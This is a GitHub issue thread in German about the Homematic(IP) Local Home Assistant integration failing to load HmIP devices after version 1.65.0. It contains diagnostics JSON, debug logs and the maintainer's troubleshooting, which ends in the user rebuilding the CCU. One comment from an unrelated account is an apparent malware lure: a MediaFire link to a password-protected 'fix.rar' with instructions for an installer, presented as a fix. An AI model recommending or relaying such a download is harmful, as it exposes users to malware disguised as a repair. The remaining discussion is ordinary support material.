### ISSUE TITLE
HomeAssistant start sehr langsam. Danach werden die Entitäten (HmIP) nicht mehr bereitgestellt.

### ISSUE THREAD

**Issue by kramer74** [SukramJ/hahomematic#1669]
### I agree to the following

- [X] I have read the [documentation](https://github.com/danielperna84/custom_homematic#custom_homematic) right now
- [X] I have read the [FAQs](https://github.com/danielperna84/custom_homematic#frequently-asked-questions) right now
- [X] I am aware of the latest [release notes](https://github.com/danielperna84/custom_homematic/releases)
- [X] I am aware that an integration that was installed via HACS also needs to be updated via HACS
- [X] The Backend (CCU/Homegear/...) is working as expected, devices are taught in and are controllable by its own UI.
- [X] I am running the latest version of the custom_component (and Home Assistant)

### The problem

Hallo zusammen, seit dem Update auf 1.65.0 bekomme ich folgende Fehlemeldung nach dem Start von HA:

Setup timed out for bootstrap waiting on {<Task pending name='Task-859' coro=<HmScheduler.init() running at /config/custom_components/homematicip_local/control_unit.py:705> wait_for=<Future pending cb=[_chain_future.<locals>._call_check_cancel() at /usr/local/lib/python3.12/asyncio/futures.py:387, <1 more>, Task.task_wakeup()]> cb=[set.remove()]>} - moving forward

Danach waren die Entitäten (HmIP) nicht mehr verfügbar. Der Start von HA lief sehr lange. Die Entitäten der BidCos-Geräte waren weiterhin verfügbar. Konnte das Problem durch Neustart der Integration nicht lösen. Erst nachdem ich das zuvor erstellte Backup mit Version 1.64.0 eingespielte habe, waren alle Entitäten wieder verfügbar...

### What version of HomematicIP (local) has the issue?

1.65.0

### What was the last working version of HomematicIP (local)?

1.64.0

### What type of installation are you running?

Home Assistant OS

### What type of installation are you running for your homematic backend?

RaspberryMatic Standalone

### Which version of your homematic backend are you running?

3.77.6

### What hardware are you running for your system?

Yellow

### Which config details do you use

- [ ] TLS
- [ ] callback data ([see](https://github.com/danielperna84/custom_homematic#callback_host-and-callback_port))

### Which interfaces do you use?

- [X] Homematic IP
- [X] Homematic (Bidcos-RF)
- [ ] Groups (Heating-Group)
- [ ] BidCos-Wired (HM-Wired)

### Diagnostics information (no logs here)

{
  "home_assistant": {
    "installation_type": "Home Assistant OS",
    "version": "2024.8.3",
    "dev": false,
    "hassio": true,
    "virtualenv": false,
    "python_version": "3.12.4",
    "docker": true,
    "arch": "aarch64",
    "timezone": "Europe/Berlin",
    "os_name": "Linux",
    "os_version": "6.6.31-haos-raspi",
    "supervisor": "2024.08.0",
    "host_os": "Home Assistant OS 13.1",
    "docker_version": "26.1.4",
    "chassis": "embedded",
    "run_as_root": true
  },
  "custom_components": {
    "browser_mod": {
      "documentation": "https://github.com/thomasloven/hass-browser_mod/blob/master/README.md",
      "version": "2.3.1",
      "requirements": []
    },
    "watchman": {
      "documentation": "https://github.com/dummylabs/thewatchman",
      "version": "0.6.3",
      "requirements": [
        "prettytable==3.10.0"
      ]
    },
    "holidays": {
      "documentation": "https://github.com/bruxy70/Holidays/",
      "version": "1.9.10",
      "requirements": [
        "python-dateutil>=2.8.2",
        "holidays>=0.35"
      ]
    },
    "battery_notes": {
      "documentation": "https://andrew-codechimp.github.io/HA-Battery-Notes/",
      "version": "2.4.2",
      "requirements": []
    },
    "sun2": {
      "documentation": "https://github.com/pnbruckner/ha-sun2/blob/3.3.3/README.md",
      "version": "3.3.3",
      "requirements": []
    },
    "wundergroundpws": {
      "documentation": "https://github.com/cytech/Home-Assistant-wundergroundpws/",
      "version": "2.0.7",
      "requirements": []
    },
    "homematicip_local": {
      "documentation": "https://github.com/danielperna84/custom_homematic",
      "version": "1.64.0",
      "requirements": [
        "hahomematic==2024.8.1"
      ]
    },
    "dwd": {
      "documentation": "https://github.com/hg1337/homeassistant-dwd#readme",
      "version": "2024.4.0",
      "requirements": [
        "defusedxml==0.7.1"
      ]
    },
    "better_thermostat": {
      "documentation": "https://github.com/KartoffelToby/better_thermostat",
      "version": "1.6.0",
      "requirements": []
    },
    "waste_collection_schedule": {
      "documentation": "https://github.com/mampfes/hacs_waste_collection_schedule#readme",
      "version": "2.1.0",
      "requirements": [
        "icalendar",
        "recurring_ical_events",
        "icalevents",
        "beautifulsoup4",
        "lxml"
      ]
    },
    "presence_simulation": {
      "documentation": "https://github.com/slashback100/presence_simulation",
      "version": "4.9",
      "requirements": []
    },
    "powercalc": {
      "documentation": "https://docs.powercalc.nl",
      "version": "v1.14.3",
      "requirements": [
        "numpy>=1.21.1"
      ]
    },
    "spook": {
      "documentation": "https://spook.boo",
      "version": "3.1.0",
      "requirements": []
    },
    "hacs": {
      "documentation": "https://hacs.xyz/docs/configuration/start",
      "version": "2.0.0",
      "requirements": [
        "aiogithubapi>=22.10.1"
      ]
    },
    "average": {
      "documentation": "https://github.com/Limych/ha-average",
      "version": "2.3.4",
      "requirements": []
    },
    "spook_inverse": {
      "documentation": "https://spook.boo",
      "version": "3.1.0",
      "requirements": []
    }
  },
  "integration_manifest": {
    "domain": "homematicip_local",
    "name": "Homematic(IP) Local",
    "codeowners": [
      "danielperna84",
      "SukramJ"
    ],
    "config_flow": true,
    "dependencies": [],
    "documentation": "https://github.com/danielperna84/custom_homematic",
    "homekit": {},
    "integration_type": "hub",
    "iot_class": "local_push",
    "issue_tracker": "https://github.com/danielperna84/hahomematic/issues",
    "loggers": [
      "hahomematic"
    ],
    "requirements": [
      "hahomematic==2024.8.1"
    ],
    "ssdp": [
      {
        "manufacturer": "EQ3",
        "manufacturerURL": "http://www.homematic.com"
      }
    ],
    "version": "1.64.0",
    "zeroconf": [],
    "is_built_in": false
  },
  "setup_times": {
    "null": {
      "setup": 7.41480034776032e-05
    },
    "a242de78edcb2cdfb14fb8d19e0c6f83": {
      "wait_import_platforms": -0.41901920398231596,
      "config_entry_setup": 8.281443006999325
    }
  },
  "data": {
    "config": {
      "created_at": "1970-01-01T00:00:00+00:00",
      "data": {
        "instance_name": "RaspberryMatic",
        "host": "192.168.77.155",
        "username": "**REDACTED**",
        "password": "**REDACTED**",
        "tls": false,
        "verify_tls": false,
        "sysvar_scan_enabled": true,
        "sysvar_scan_interval": 30,
        "callback_host": null,
        "callback_port": null,
        "json_port": null,
        "enable_system_notifications": true,
        "interface": {
          "HmIP-RF": {
            "port": 2010
          },
          "BidCos-RF": {
            "port": 2001
          }
        }
      },
      "disabled_by": null,
      "domain": "homematicip_local",
      "entry_id": "a242de78edcb2cdfb14fb8d19e0c6f83",
      "minor_version": 1,
      "modified_at": "1970-01-01T00:00:00+00:00",
      "options": {},
      "pref_disable_new_entities": false,
      "pref_disable_polling": false,
      "source": "ssdp",
      "title": "RaspberryMatic",
      "unique_id": "5A4993EF1B",
      "version": 3
    },
    "platform_stats": {
      "binary_sensor": 34,
      "climate": 13,
      "cover": 8,
      "hub_binary_sensor": 16,
      "hub_button": 1,
      "hub_sensor": 21,
      "select": 2,
      "sensor": 72,
      "switch": 10,
      "update": 48
    },
    "devices": [
      "HM-ES-TX-WM",
      "HM-RCV-50",
      "HMIP-PS",
      "HmIP-BROLL",
      "HmIP-BS2",
      "HmIP-FALMOT-C12",
      "HmIP-FSM",
      "HmIP-RCV-50",
      "HmIP-SLO",
      "HmIP-SMO",
      "HmIP-SMO-2",
      "HmIP-STHD",
      "HmIP-STHO",
      "HmIP-SWDO-I",
      "HmIP-WRC6",
      "RPI-RF-MOD"
    ],
    "system_information": {
      "available_interfaces": [
        "CUxD",
        "BidCos-RF",
        "VirtualDevices",
        "HmIP-RF"
      ],
      "auth_enabled": true,
      "https_redirect_enabled": false,
      "serial": "**REDACTED**"
    }
  }
}

### Log file extract. Anything in the logs that might be useful for us? The log (Setting/System/Logs -> load full log) is the best source to support trouble shooting!

```txt
Setup timed out for bootstrap waiting on {<Task pending name='Task-859' coro=<HmScheduler.init() running at /config/custom_components/homematicip_local/control_unit.py:705> wait_for=<Future pending cb=[_chain_future.<locals>._call_check_cancel() at /usr/local/lib/python3.12/asyncio/futures.py:387, <1 more>, Task.task_wakeup()]> cb=[set.remove()]>} - moving forward
```

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by SukramJ** [comment]
Mit Geschwindigkeit gibt es eigentlich keine Probleme. 

Bitte die Version noch mal aktualisieren und abwarten, da der erste Neustart einwenig länger dauern könnte.

Wenn es immer noch Probleme mit den HmIP Komponenten gibt, dann folgendes in der configuration.yaml eintragen und HA neu starten:

```
logger:
  default: warn
  logs:
    hahomematic: debug
    custom_components.homematicip_local: debug
```

Nach dem Neustart (+10 Minuten) die vollständige Logdatei hier als Anhang hochladen.

**Comment by kramer74** [comment]
Hier das Log File...
[home-assistant_2024-08-28T05-18-25.339Z.log](https://github.com/user-attachments/files/16777040/home-assistant_2024-08-28T05-18-25.339Z.log)

**Comment by SukramJ** [comment]
Und wurden die HmIP-Geräte geladen? In den Logs sieht es danach aus.
Bitte auch die Diagnose Informationen für die aktuelle Version hochladen.

**Comment by kramer74** [comment]
{
  "home_assistant": {
    "installation_type": "Home Assistant OS",
    "version": "2024.8.3",
    "dev": false,
    "hassio": true,
    "virtualenv": false,
    "python_version": "3.12.4",
    "docker": true,
    "arch": "aarch64",
    "timezone": "Europe/Berlin",
    "os_name": "Linux",
    "os_version": "6.6.31-haos-raspi",
    "supervisor": "2024.08.0",
    "host_os": "Home Assistant OS 13.1",
    "docker_version": "26.1.4",
    "chassis": "embedded",
    "run_as_root": true
  },
  "custom_components": {
    "browser_mod": {
      "documentation": "https://github.com/thomasloven/hass-browser_mod/blob/master/README.md",
      "version": "2.3.1",
      "requirements": []
    },
    "watchman": {
      "documentation": "https://github.com/dummylabs/thewatchman",
      "version": "0.6.3",
      "requirements": [
        "prettytable==3.10.0"
      ]
    },
    "holidays": {
      "documentation": "https://github.com/bruxy70/Holidays/",
      "version": "1.9.10",
      "requirements": [
        "python-dateutil>=2.8.2",
        "holidays>=0.35"
      ]
    },
    "battery_notes": {
      "documentation": "https://andrew-codechimp.github.io/HA-Battery-Notes/",
      "version": "2.4.2",
      "requirements": []
    },
    "sun2": {
      "documentation": "https://github.com/pnbruckner/ha-sun2/blob/3.3.3/README.md",
      "version": "3.3.3",
      "requirements": []
    },
    "wundergroundpws": {
      "documentation": "https://github.com/cytech/Home-Assistant-wundergroundpws/",
      "version": "2.0.7",
      "requirements": []
    },
    "homematicip_local": {
      "documentation": "https://github.com/danielperna84/custom_homematic",
      "version": "1.65.0",
      "requirements": [
        "hahomematic==2024.8.13"
      ]
    },
    "dwd": {
      "documentation": "https://github.com/hg1337/homeassistant-dwd#readme",
      "version": "2024.4.0",
      "requirements": [
        "defusedxml==0.7.1"
      ]
    },
    "better_thermostat": {
      "documentation": "https://github.com/KartoffelToby/better_thermostat",
      "version": "1.6.0",
      "requirements": []
    },
    "waste_collection_schedule": {
      "documentation": "https://github.com/mampfes/hacs_waste_collection_schedule#readme",
      "version": "2.1.0",
      "requirements": [
        "icalendar",
        "recurring_ical_events",
        "icalevents",
        "beautifulsoup4",
        "lxml"
      ]
    },
    "presence_simulation": {
      "documentation": "https://github.com/slashback100/presence_simulation",
      "version": "4.9",
      "requirements": []
    },
    "powercalc": {
      "documentation": "https://docs.powercalc.nl",
      "version": "v1.14.3",
      "requirements": [
        "numpy>=1.21.1"
      ]
    },
    "spook": {
      "documentation": "https://spook.boo",
      "version": "3.1.0",
      "requirements": []
    },
    "hacs": {
      "documentation": "https://hacs.xyz/docs/configuration/start",
      "version": "2.0.0",
      "requirements": [
        "aiogithubapi>=22.10.1"
      ]
    },
    "average": {
      "documentation": "https://github.com/Limych/ha-average",
      "version": "2.3.4",
      "requirements": []
    },
    "spook_inverse": {
      "documentation": "https://spook.boo",
      "version": "3.1.0",
      "requirements": []
    }
  },
  "integration_manifest": {
    "domain": "homematicip_local",
    "name": "Homematic(IP) Local",
    "codeowners": [
      "danielperna84",
      "SukramJ"
    ],
    "config_flow": true,
    "dependencies": [],
    "documentation": "https://github.com/danielperna84/custom_homematic",
    "homekit": {},
    "integration_type": "hub",
    "iot_class": "local_push",
    "issue_tracker": "https://github.com/danielperna84/hahomematic/issues",
    "loggers": [
      "hahomematic"
    ],
    "requirements": [
      "hahomematic==2024.8.13"
    ],
    "ssdp": [
      {
        "manufacturer": "EQ3",
        "manufacturerURL": "http://www.homematic.com"
      }
    ],
    "version": "1.65.0",
    "zeroconf": [],
    "is_built_in": false
  },
  "setup_times": {
    "null": {
      "setup": 6.575899999461399e-05
    },
    "01J6BYTP4ZVNB3CVE3E05265AE": {
      "wait_import_platforms": -6.385603524000089,
      "wait_base_component": -0.0023599080000167305,
      "config_entry_setup": 9.939954050999972
    }
  },
  "data": {
    "config": {
      "created_at": "2024-08-28T07:40:00.031254+00:00",
      "data": {
        "instance_name": "RaspberryMatic",
        "host": "192.168.77.155",
        "username": "**REDACTED**",
        "password": "**REDACTED**",
        "tls": false,
        "verify_tls": false,
        "interface": {
          "HmIP-RF": {
            "port": 2010
          },
          "BidCos-RF": {
            "port": 2001
          }
        },
        "advanced_config": {}
      },
      "disabled_by": null,
      "domain": "homematicip_local",
      "entry_id": "01J6BYTP4ZVNB3CVE3E05265AE",
      "minor_version": 1,
      "modified_at": "2024-08-28T07:40:00.031265+00:00",
      "options": {},
      "pref_disable_new_entities": false,
      "pref_disable_polling": false,
      "source": "ssdp",
      "title": "RaspberryMatic",
      "unique_id": "5A4993EF1B",
      "version": 5
    },
    "platform_stats": {
      "binary_sensor": 2,
      "hub_binary_sensor": 16,
      "hub_button": 1,
      "hub_sensor": 21,
      "sensor": 8,
      "update": 2
    },
    "devices": [
      "HM-ES-TX-WM",
      "HM-RCV-50"
    ],
    "system_information": {
      "available_interfaces": [
        "CUxD",
        "BidCos-RF",
        "VirtualDevices",
        "HmIP-RF"
      ],
      "auth_enabled": true,
      "https_redirect_enabled": false,
      "serial": "**REDACTED**"
    }
  }
}

Keine HmIP-Geräte nur noch die BidCos-Geräte...

**Comment by SukramJ** [comment]
Du hast einige Integrationen die laut deinem log Probleme bereiten, aber so ganz schlau werde ich im Moment noch nicht daraus.

Sachen die Du bitte Testen könntest:

1. Prüfe in den CCU/RM Logs ob dort Fehlermeldunge zu finden sind.
2. Integration de-installieren und wieder installieren

**Comment by kramer74** [comment]
So habe einige Integratione entfernt:
1. Logs von CCU/RM  waren ohne Auflälligkeiten. Konnte viele Request/Response Einträge sehen zwischen HA und RM
2.  Integration gelöscht und danach wieder installiert
    - BidCos Devices werden ohne Problem erkannt und in HA angelegt
    - Bei den HmIP-Devices bleibt der Prozess stehen, genau genommen bei Device HMIP-PS
    
  2024-08-28 15:39:40.412 DEBUG (MainThread) [hahomematic.client] FETCH_PARAMSET_DESCRIPTIONS for 001BA0C9A151B1:15
2024-08-28 15:39:40.412 DEBUG (MainThread) [hahomematic.client] GET_PARAMSET_DESCRIPTIONS for 001BA0C9A151B1:16
2024-08-28 15:39:40.412 DEBUG (MainThread) [hahomematic.client.xml_rpc] __ASYNC_REQUEST: ('getParamsetDescription', ('001BA0C9A151B1:16', 'MASTER'))
2024-08-28 15:39:40.421 DEBUG (MainThread) [hahomematic.client.xml_rpc] __ASYNC_REQUEST: ('getParamsetDescription', ('001BA0C9A151B1:16', 'VALUES'))
2024-08-28 15:39:40.429 DEBUG (MainThread) [hahomematic.client.xml_rpc] __ASYNC_REQUEST: ('getParamsetDescription', ('001BA0C9A151B1:16', 'LINK'))
2024-08-28 15:39:40.437 DEBUG (MainThread) [hahomematic.client.xml_rpc] __ASYNC_REQUEST: ('getParamsetDescription', ('001BA0C9A151B1:16', 'SERVICE'))
2024-08-28 15:39:40.447 DEBUG (MainThread) [hahomematic.client] FETCH_PARAMSET_DESCRIPTIONS for 001BA0C9A151B1:16
2024-08-28 15:39:40.448 DEBUG (MainThread) [hahomematic.client] GET_PARAMSET_DESCRIPTIONS for 00021D89A1AEE9
2024-08-28 15:39:40.448 DEBUG (MainThread) [hahomematic.client.xml_rpc] __ASYNC_REQUEST: ('getParamsetDescription', ('00021D89A1AEE9', 'MASTER'))
2024-08-28 15:39:40.456 DEBUG (MainThread) [hahomematic.client.xml_rpc] __ASYNC_REQUEST: ('getParamsetDescription', ('00021D89A1AEE9', 'SERVICE'))
2024-08-28 15:39:40.466 DEBUG (MainThread) [hahomematic.client] FETCH_PARAMSET_DESCRIPTIONS for 00021D89A1AEE9
2024-08-28 15:39:40.466 DEBUG (MainThread) [hahomematic.client] GET_PARAMSET_DESCRIPTIONS for 00021D89A1AEE9:0
2024-08-28 15:39:40.466 DEBUG (MainThread) [hahomematic.client.xml_rpc] __ASYNC_REQUEST: ('getParamsetDescription', ('00021D89A1AEE9:0', 'MASTER'))

00021D89A1AEE9 steht für HmIP-PS

Beim anschließendem Neuladen der Integration passiert folgendes:
2024-08-28 15:58:03.760 DEBUG (MainThread) [hahomematic.central] check_connection: Checking connection to server CCU3
2024-08-28 15:58:03.760 DEBUG (MainThread) [hahomematic.caches.dynamic] PING PONG CACHE: Increase pending PING count: CCU3-BidCos-RF - 1 for ts: 2024-08-28 15:58:03.760329
2024-08-28 15:58:03.761 DEBUG (MainThread) [hahomematic.client.xml_rpc] __ASYNC_REQUEST: ('ping', ("CCU3-BidCos-RF#28.08.2024 15:58:03.760329'",))
2024-08-28 15:58:03.772 DEBUG (MainThread) [hahomematic.caches.dynamic] PING PONG CACHE: Increase pending PING count: CCU3-HmIP-RF - 1 for ts: 2024-08-28 15:58:03.772057
2024-08-28 15:58:03.773 DEBUG (MainThread) [hahomematic.client.xml_rpc] __ASYNC_REQUEST: ('ping', ("CCU3-HmIP-RF#28.08.2024 15:58:03.772057'",))
2024-08-28 15:58:03.777 DEBUG (MainThread) [hahomematic.central] EVENT: interface_id = CCU3-BidCos-RF, channel_address = CENTRAL, parameter = PONG, value = CCU3-BidCos-RF#28.08.2024 15:58:03.760329'
2024-08-28 15:58:03.778 DEBUG (MainThread) [hahomematic.caches.dynamic] PING PONG CACHE: Reduce pending PING count: CCU3-BidCos-RF - 0 for ts: 2024-08-28 15:58:03.760329
2024-08-28 15:58:03.784 DEBUG (MainThread) [hahomematic.central] EVENT: interface_id = CCU3-HmIP-RF, channel_address = CENTRAL:0, parameter = PONG, value = CCU3-HmIP-RF#28.08.2024 15:58:03.772057'
2024-08-28 15:58:03.785 DEBUG (MainThread) [hahomematic.caches.dynamic] PING PONG CACHE: Reduce pending PING count: CCU3-HmIP-RF - 0 for ts: 2024-08-28 15:58:03.772057
2024-08-28 15:58:10.426 DEBUG (MainThread) [custom_components.homematicip_local.control_unit] Stopping central unit CCU3
2024-08-28 15:58:10.426 DEBUG (MainThread) [hahomematic.central] STOP_CONNECTION_CHECKER: Stopped connection_checker for CCU3
2024-08-28 15:58:10.426 DEBUG (MainThread) [hahomematic.client] PROXY_DE_INIT: init('http://192.168.77.141:55155')
2024-08-28 15:58:10.427 DEBUG (MainThread) [hahomematic.client.xml_rpc] __ASYNC_REQUEST: ('init', ('http://192.168.77.141:55155',))
2024-08-28 15:58:10.436 DEBUG (MainThread) [hahomematic.central] DE_INIT_CLIENTS: Proxy de-initialized: CCU3-BidCos-RF
2024-08-28 15:58:10.436 DEBUG (MainThread) [hahomematic.client] PROXY_DE_INIT: init('http://192.168.77.141:55155')
2024-08-28 15:58:10.436 DEBUG (MainThread) [hahomematic.client.xml_rpc] __ASYNC_REQUEST: ('init', ('http://192.168.77.141:55155',))
2024-08-28 15:58:10.446 DEBUG (MainThread) [hahomematic.central] DE_INIT_CLIENTS: Proxy de-initialized: CCU3-HmIP-RF
2024-08-28 15:58:10.446 DEBUG (MainThread) [hahomematic.central] STOP_CLIENTS: Stopping CCU3-BidCos-RF
2024-08-28 15:58:10.448 DEBUG (MainThread) [hahomematic.central] STOP_CLIENTS: Stopping CCU3-HmIP-RF
2024-08-28 15:59:10.450 DEBUG (MainThread) [hahomematic.async_support] Waited 60 seconds for task: <Future pending cb=[_chain_future.<locals>._call_check_cancel() at /usr/local/lib/python3.12/asyncio/futures.py:387, <1 more>, Task.task_wakeup()]>
2024-08-28 16:00:10.452 DEBUG (MainThread) [hahomematic.async_support] Waited 120 seconds for task: <Future pending cb=[_chain_future.<locals>._call_check_cancel() at /usr/local/lib/python3.12/asyncio/futures.py:387, <1 more>, Task.task_wakeup()]>
2024-08-28 16:01:10.454 DEBUG (MainThread) [hahomematic.async_support] Waited 180 seconds for task: <Future pending cb=[_chain_future.<locals>._call_check_cancel() at /usr/local/lib/python3.12/asyncio/futures.py:387, <1 more>, Task.task_wakeup()]>
2024-08-28 16:02:10.457 DEBUG (MainThread) [hahomematic.async_support] Waited 240 seconds for task: <Future pending cb=[_chain_future.<locals>._call_check_cancel() at /usr/local/lib/python3.12/asyncio/futures.py:387, <1 more>, Task.task_wakeup()]>

Die Zeit erhöht sich konstant um 60 Sekunden.... Das wars...

**Comment by SukramJ** [comment]
> Bei den HmIP-Devices bleibt der Prozess stehen, genau genommen bei Device HMIP-PS

In der Vergangenheit gab es schon Benutzer deren CCU teilweise nur fehlerhaft geantwortet, und das hört sich bei dir genau so an. Wie da die Lösung war kann ich gar nicht so genau sagen, weil ich teilweise z .Bsp auf das Homematic Forum zur Lösungssuche verwiesen habe.

Warum funktioniert es mit einer alten Version?
Mein Theorie: Du spielst ein Backup ein in dem auch die Cache-Dateien (homematicip_local/cache/) enthalten sind.
Mit Version 5 werden bei der Migration eben diese Dateien einmalig gelöscht, und der Inhalt muss neu von der CCU gezogen werden. Jetzt werden also CCU Schnittstellen (getParamsetDescription) angesprochen, die zuletzt bei der Erstinstallation angesprochen wurden, und danach nur noch sporadisch verwendet wurden. 

Ich geh mal davon aus das die CCU schon neu gestartet wurde. Oder?
Ansonsten würde ich das betroffene Gerät mal ablernen und schauen was dann passiert.

**Comment by Baxxy13** [comment]
Hmm, ich habe 3 HA's mit HomematicIP (local) 1.65.0 am laufen. Angebunden sind 2x eine und 1 x zwei RaspberryMatics.
Die Geräteanzahl der 4 RaspberryMatics variiert von 5 - 50, davon ist der größte Teil HmIP. 
Keiner der 3 HA's zeigt Probleme bezüglich der Integration.

Ich weiß das hilft nicht wirklich weiter, zeigt aber m.E. das es kein generelles Problem mit der 1.65.0 gibt.

**Comment by kramer74** [comment]
Das mit dem Ablernen hatte ich mir schon gedacht. Habe mir jetzt einfach mal den Aufwand gemacht und alle Geräte abgelernt und die CCU/RM neu aufgesetzt. Danach konnte ich alle Geräte wieder in HA sehen und ansprechen.

Danke für deine/eure Analyse. 

Und auf diesem Wege noch vielen Dank an die sehr gute Integration für HA
